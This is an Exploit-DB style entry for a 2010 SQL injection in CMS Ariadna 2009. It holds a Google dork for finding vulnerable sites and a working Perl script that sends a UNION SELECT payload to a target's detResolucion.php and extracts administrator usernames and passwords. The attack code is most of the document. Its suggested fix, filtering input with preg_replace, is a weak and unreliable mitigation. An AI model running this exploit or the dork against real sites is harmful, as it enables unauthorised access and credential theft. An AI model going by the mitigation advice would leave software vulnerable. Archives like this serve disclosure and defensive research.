CMS Ariadna 2009 SQL Injection

vendor:

N/A

by:

Andrés Gómez

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

CMS Ariadna 2009 SQL Injection

Malicious users may inject SQL querys into a vulnerable application to fool a user in order to gather data from them or see sensible information.

Mitigation:

The application should use preg_replace() to filter out any malicious characters from user input.

Source

Exploit-DB raw data:

# Exploit Title : CMS Ariadna 2009 SQL Injection
# Date : 2010-04-19
# Author : Andrés Gómez
# Contact : gomezandres@adinet.com.uy
# Dork : "allinurl: detResolucion.php?tipodoc_id="
########################################################################
Exploit in Perl Start In Next Line:

use LWP::Simple;

########################################################################
# Malicious users may inject SQL querys into a vulnerable
# application to fool a user in order to gather data from them or see
sensible information.
########################################################################
# Solution:
# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
########################################################################
# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
##########################[Andrés Gómez]#################################

my $target = $ARGV[0];
unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomez\n\n";
print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
print "\nEjemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/\n" ; exit 1; }

$sql =
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";

$final = $target.$sql;
$contenido = get($final);

print "\n\n[+] Pagina Web: $target\n\n";
if ($contenido =~/security(.*):pentest(.*)/) {
print "[-] Datos extraidos con exito:\n\n";
print "[+] Usuario = $1\n";
print "[+] Password = $2\n";
} else {
print "[-] No se obtuvieron datos\n\n";
exit 1;
}

print "\n[ñ] Escriba exit para salir de la aplicacion\n";

exit 1;